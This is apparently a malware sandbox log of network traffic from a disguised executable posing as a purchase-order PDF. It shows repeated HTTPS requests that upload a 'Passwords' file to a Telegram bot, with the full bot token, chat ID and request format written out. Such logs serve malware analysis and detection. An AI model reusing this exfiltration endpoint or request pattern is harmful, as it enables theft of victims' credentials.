                                                                                                          2024-12-17 02:30:14 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13512,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402614,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449803149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:21 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1f3010ecdd81
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:30:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 33 30 31 30 65 63 64 64 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1f3010ecdd81Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:22 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:22 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:30:22 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13513,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402622,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449815149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:25 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1f5c280312c3
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:30:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 35 63 32 38 30 33 31 32 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1f5c280312c3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:25 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:25 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:30:25 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13515,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402625,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449827149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:30 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1f9130a6ddec
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:30:30 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 39 31 33 30 61 36 64 64 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1f9130a6ddecContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:30 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:30 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:30:30 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13516,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402630,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.449839149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:34 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1fc089a266c5
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:30:34 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 63 30 38 39 61 32 36 36 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1fc089a266c5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:35 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:35 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:30:35 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13517,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402635,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.449850149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:37 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1feba30ad185
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:30:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 65 62 61 33 30 61 64 31 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1feba30ad185Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:38 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:38 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:30:38 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13518,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402638,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.449863149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:43 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd203aaca394ff
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:30:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 33 61 61 63 61 33 39 34 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd203aaca394ffContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:44 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:43 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:30:44 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13519,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402643,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.449875149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:48 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd208b8ee19467
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-17 02:30:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 38 62 38 65 65 31 39 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd208b8ee19467Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:48 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:48 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
